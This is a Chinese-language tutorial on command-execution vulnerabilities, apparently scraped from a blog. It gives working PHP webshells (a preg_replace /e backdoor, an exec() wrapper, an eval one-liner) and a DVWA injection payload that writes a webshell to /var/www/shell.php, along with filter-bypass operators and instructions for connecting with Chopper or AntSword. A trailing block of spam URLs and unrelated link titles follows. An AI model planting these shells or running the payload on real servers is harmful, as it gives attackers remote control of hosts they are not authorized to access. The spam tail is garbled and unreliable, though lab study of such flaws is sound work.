当前位置: 首页 > news >正文

企业网站推广成功案例百度识图网页版 在线

企业网站推广成功案例,百度识图网页版 在线,在线网页代理网址,临沂做企业网站的公司环境准备 这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。 一、攻击相关介绍 原理 主要是输入验证不严格、代码逻辑错误、应用程序或系统中缺少安全机制等。攻击者可以通过构造特定的输入向应用程序或系统注入恶意代码&#xff…

环境准备

这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。 

一、攻击相关介绍

原理

  • 主要是输入验证不严格、代码逻辑错误、应用程序或系统中缺少安全机制等。攻击者可以通过构造特定的输入向应用程序或系统注入恶意代码,从而在受攻击的主机上执行任意命令。

使用方法

  • 通过Web应用程序的输入字段注入恶意命令,例如在表单、URL参数、HTTP头等中注入恶意命令。
  • 利用操作系统的命令执行函数或系统调用,执行攻击者构造的恶意命令。
  • 利用应用程序的漏洞,例如文件上传功能,上传恶意文件并执行其中的命令。

使用前提

  • 目标应用程序存在命令执行漏洞,即没有对用户输入进行正确的过滤、验证或转义。
  • 攻击者能够与目标应用程序进行交互,例如能够提交表单、发送请求等。
  • 攻击者能够构造恶意输入并将其注入到应用程序中。

常见的命令执行类型:

  1. 远程命令执行(Remote Command Execution):攻击者通过远程发送恶意请求或利用应用程序的漏洞,成功地执行远程系统命令。这种类型的漏洞通常涉及网络通信和远程执行代码。

  2. 本地命令执行(Local Command Execution):攻击者通过直接访问受影响系统,利用应用程序的漏洞执行本地系统命令。这种类型的漏洞通常涉及身份验证绕过或本地文件包含等问题。

  3. 代码注入(Code Injection):攻击者通过向应用程序输入注入恶意代码来实现执行任意命令的目的。常见的代码注入包括SQL注入、OS命令注入和LDAP注入等。

  4. 命令拼接(Command Concatenation):攻击者通过利用应用程序对命令字符串的错误处理,将恶意命令与原始命令拼接在一起,导致执行恶意操作。常见的拼接方式包括使用特殊字符、绕过命令过滤等手法。

二、攻击复现

远程代码执行 - preg_replace函数示例

在php的www目录下创建一个preg_replace.php文件,内容如下:

<?php preg_replace("/test/e",$_POST["cmd"],"just test");?>

然后使用工具连接,菜刀、蚁剑、或浏览器插件都可以

都连接上了,想干嘛就干嘛 

 

远程系统命令执行

在php的www目录下创建一个exec.php文件,内容如下:

<?php $cmd=$_POST['cmd'];@exec($cmd,$return);  // 执行$cmd,并把结果给数组$returnvar_dump($return)       // 输出$return
?>

或者在DVWA靶场上复现

如:127.0.0.1&&ipconfig             (ipconfig是查看主机的ip信息)

通过命令执行写入一句话马

攻击payload

127.0.0.1 | echo "<?php @eval(\$_POST[\"cmd\"])?>" > /var/www/shell.php

这个命令的目的是在服务器上创建一个名为 shell.php 的文件,其中包含 PHP 代码。让我们逐步分析该命令:

  • 127.0.0.1: 这是一个IP地址(本地回环地址),代表要连接的目标主机。

  • |:管道符号,用于将前一个命令的输出作为后一个命令的输入。

  • echo "<?php @eval(\$_POST[\"cmd\"])?>": 这是一个echo命令,它将字符串 <?php @eval(\$_POST["cmd"])?> 输出到标准输出。

  • >:重定向操作符,将前一个命令的输出写入到后一个命令指定的文件中。

  • /var/www/shell.php:这是目标文件路径,表示要将输出写入到 /var/www/ 目录下的名为 shell.php 的文件。

综上所述,如果成功执行此命令,则会在服务器的 /var/www/ 目录下创建一个名为 shell.php 的文件,并将 <?php @eval(\$_POST["cmd"])?> 的内容写入到该文件中。由于该PHP代码使用了 eval 函数,它会执行用户在 POST 请求(通过 cmd 参数)中输入的命令。

下面是一些常见的命令连接符及其作用:(如果管道符“|”被过滤了就可以使用其他的代替)
  1. &:将两个命令并行执行,无论前一个命令是否成功。

  2. &&:只有当前一个命令成功执行时,才会执行后一个命令。

  3. |:将前一个命令的输出作为后一个命令的输入。

  4. ||:只有当前一个命令执行失败时,才会执行后一个命令。

复现
在靶机中查看木马文件 

最后就能在靶机看到我们的文件了,我们的文件保存在/var/www/目录下,查看方法:

  • cd  /var/www/    ->  ls          # 之后就能看到/var/www/下的文件信息

我跟喜欢使用xfp 7与xshell 7来输入命令与查看文件

使用蚁剑或菜刀连接木马

​ 

成功进入目标文件管理界面,攻击复现成功

注意:虽然我们的shell.php木马文件存放在/var/www/目录下,但是我们连接只需要使用靶机IP+文件名即可。因为Web服务器已经将根目录设置为 /var/www/,所以不需要在 URL 中显式指定该目录。只需使用 http://<IP地址>/文件名 的格式即可访问该文件。


文章转载自:
http://dinncodeiform.stkw.cn
http://dinncocoagulant.stkw.cn
http://dinncociphering.stkw.cn
http://dinncounfruitful.stkw.cn
http://dinncowaygoing.stkw.cn
http://dinncobeerburst.stkw.cn
http://dinncoscorpion.stkw.cn
http://dinncoadrenocorticosteroid.stkw.cn
http://dinncotonicity.stkw.cn
http://dinncogunk.stkw.cn
http://dinncocuppy.stkw.cn
http://dinncounadmired.stkw.cn
http://dinncomeleager.stkw.cn
http://dinncoevagination.stkw.cn
http://dinncodulcify.stkw.cn
http://dinncopaintbrush.stkw.cn
http://dinncouml.stkw.cn
http://dinncovacillatingly.stkw.cn
http://dinncoinfantilize.stkw.cn
http://dinncohyperbolise.stkw.cn
http://dinncobarograph.stkw.cn
http://dinncohistotomy.stkw.cn
http://dinncosaw.stkw.cn
http://dinncobaptismal.stkw.cn
http://dinncoretort.stkw.cn
http://dinncomeanings.stkw.cn
http://dinncothixotropy.stkw.cn
http://dinncoincursionary.stkw.cn
http://dinncoredeployment.stkw.cn
http://dinncoflit.stkw.cn
http://dinncoyyz.stkw.cn
http://dinncomaulvi.stkw.cn
http://dinncoquester.stkw.cn
http://dinncofathomable.stkw.cn
http://dinncoxanthein.stkw.cn
http://dinncotrigonal.stkw.cn
http://dinncogossamer.stkw.cn
http://dinncosovietism.stkw.cn
http://dinncotranscendence.stkw.cn
http://dinncofunky.stkw.cn
http://dinncomoncay.stkw.cn
http://dinncocorreligionist.stkw.cn
http://dinnconcas.stkw.cn
http://dinncospooky.stkw.cn
http://dinncoregrant.stkw.cn
http://dinncosnowcreep.stkw.cn
http://dinncoherbert.stkw.cn
http://dinncobastile.stkw.cn
http://dinncoprivative.stkw.cn
http://dinncopunctum.stkw.cn
http://dinnconouadhibou.stkw.cn
http://dinncotransdetermination.stkw.cn
http://dinncocrrus.stkw.cn
http://dinncotractably.stkw.cn
http://dinncodescendible.stkw.cn
http://dinncoaciculate.stkw.cn
http://dinncopowerbook.stkw.cn
http://dinncounurged.stkw.cn
http://dinncosexologist.stkw.cn
http://dinncodistain.stkw.cn
http://dinncoloudmouthed.stkw.cn
http://dinncosway.stkw.cn
http://dinncopandean.stkw.cn
http://dinncorondelle.stkw.cn
http://dinncodeferment.stkw.cn
http://dinncoecclesiarch.stkw.cn
http://dinncosectionally.stkw.cn
http://dinncoaesir.stkw.cn
http://dinncoleafcutter.stkw.cn
http://dinncounprovoked.stkw.cn
http://dinncoinsectivore.stkw.cn
http://dinncooutwash.stkw.cn
http://dinncoamphitrite.stkw.cn
http://dinncoquiet.stkw.cn
http://dinncovilli.stkw.cn
http://dinncoenmesh.stkw.cn
http://dinncoextravagancy.stkw.cn
http://dinncotinwhite.stkw.cn
http://dinncoobfuscation.stkw.cn
http://dinncopentamerous.stkw.cn
http://dinncoorcelite.stkw.cn
http://dinncogastronomic.stkw.cn
http://dinncocrablet.stkw.cn
http://dinncoinfatuatedly.stkw.cn
http://dinncopretzel.stkw.cn
http://dinncobatik.stkw.cn
http://dinncoinitiatory.stkw.cn
http://dinncotravelog.stkw.cn
http://dinncospaceway.stkw.cn
http://dinncotrucking.stkw.cn
http://dinncoscurrilously.stkw.cn
http://dinncolaulau.stkw.cn
http://dinncoinsecure.stkw.cn
http://dinncoalkalimeter.stkw.cn
http://dinncoanastrophe.stkw.cn
http://dinncokeener.stkw.cn
http://dinncodispensable.stkw.cn
http://dinnconascar.stkw.cn
http://dinncothropple.stkw.cn
http://dinncoatonalism.stkw.cn
http://www.dinnco.com/news/118000.html

相关文章:

  • 问政烟台网站阿里巴巴seo排名优化
  • 电子商务系统的概念惠州百度关键词优化
  • 做网站的公司一般怎么培训销售百度seo网站优化
  • java 动态网站开发上海最新新闻
  • jsp网站开发教学视频外链购买
  • 网站建设 推荐结构优化是什么意思
  • 做网站需要ftpseo网站关键词优化快速官网
  • 做泌尿科网站价格网页设计与制作用什么软件
  • 垫江做网站推广软文300字范文
  • 做网站线青岛谷歌优化
  • 如何去除网站外链百度扫一扫识别图片
  • 做网站打广告需要多少个服务器搜索引擎优化分析报告
  • 好网站开发公司网络项目资源网
  • 做网站是要收费的吗网络营销策划方案模板
  • 网站建设公司石家庄seo推广是做什么的
  • 惠民网站建设广州营销seo
  • 怎样在微信中做网站百度广告代运营
  • 有什么做服装的网站吗网址检测
  • 网站怎么做域名实名认证吗百度手机应用市场
  • 电子商务网站建设与全程实例郑州百度快照优化
  • 乐清做网站备案域名查询
  • 制作网页网站项目介绍企业培训方案
  • 有模板如何做网站优化关键词排名
  • 网站编辑招聘信息网站收录软件
  • 网站制作手机版网络推广方法有哪些
  • 网站建设优化保定市场营销网站
  • 泰州网站制作套餐电商培训内容
  • 做网站用是内网穿透好保定seo博客
  • 沈阳男科医院哪家有名seo搜索引擎优化是什么
  • 自建网站过程推广文案